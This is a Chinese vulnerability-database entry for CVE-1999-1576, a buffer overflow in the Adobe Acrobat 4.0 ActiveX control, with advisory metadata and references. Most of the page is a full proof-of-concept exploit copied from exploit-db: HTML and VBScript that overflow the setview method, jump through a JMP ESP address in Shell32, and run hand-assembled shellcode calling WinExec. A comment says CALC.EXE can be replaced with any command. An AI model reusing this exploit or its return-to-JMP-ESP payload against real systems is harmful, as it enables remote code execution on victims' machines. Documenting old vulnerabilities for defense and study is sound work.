Adobe Acrobat Viewer ActiveX 缓冲区溢出漏洞

Adobe Acrobat Viewer ActiveX 缓冲区溢出漏洞

漏洞ID 1105558 漏洞类型 缓冲区溢出
发布时间 1999-09-27 更新时间 2005-10-20
图片[1]-Adobe Acrobat Viewer ActiveX 缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-1576
图片[2]-Adobe Acrobat Viewer ActiveX 缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199909-051
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19514
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-051
|漏洞详情
AcrobatReader4.0的AdobeAcrobatActiveX控件(pdf.ocx,PDF.PdfCtrl.1)1.3.188中存在缓冲区溢出漏洞。远程攻击者通过pdf.setview类函数执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/666/info

There is a buffer overflow in the 1.3.188 version of the Adobe Acrobat ActiveX control (pdf.ocx) that ships with Acrobat Viewer 4.0. This ActiveX control is marked 'Safe for Scripting' within Internet Explorer 4.X. Arbitrary commands may be executed if the ActiveX control is run in a malicious manner 

This control from Adobe Acrobat, can be exploited through 
the setview method, and because ESP points to the address 
after the RET address, we can place arbitrary code at this 
point and JMP to it by RET'ing to a JMP ESP, in this case, 
one found in Shell32. The code simply executes CALC.EXE 
then calls ExitProcess to terminate the host without it 
crashing. I have attempted to notify Adobe of the issue, 
however they don't appear to have any form of direct 
secure@ address.

<object classid="clsid:CA8A9780-280D-11CF-A24D-444553540000"
id="pdf"></object>

<script language="VBscript"><!--

msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10) 
+ "Written by Shane Hird")

expstr 
= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA" 

expstr = expstr + Chr(235)	'Address in SHELL32, Win98 
(7FD035EB) of JMP ESP
expstr = expstr + Chr(53)	'You may need to use a 
different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)

'Stack is slightly trashed, but NOPs fix it up ok
expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144) 
+ Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 1)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + 
Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) 
+ Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

'Call exploitable method
pdf.setview(expstr)

--></script>
|参考资料

来源:US-CERTVulnerabilityNote:VU#25919
名称:VU#25919
链接:http://www.kb.cert.org/vuls/id/25919
来源:XF
名称:adobe-acrobat-pdf-bo(3318)
链接:http://xforce.iss.net/xforce/xfdb/3318
来源:BID
名称:666
链接:http://www.securityfocus.com/bid/666
来源:BUGTRAQ
名称:19990924SeveralActiveXBufferOverruns
链接:http://www.securityfocus.com/archive/1/28719

相关推荐: imwheel数据包imwheel-solo漏洞

imwheel数据包imwheel-solo漏洞 漏洞ID 1205366 漏洞类型 未知 发布时间 2001-08-31 更新时间 2001-08-31 CVE编号 CVE-2000-1190 CNNVD-ID CNNVD-200108-187 漏洞平台 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享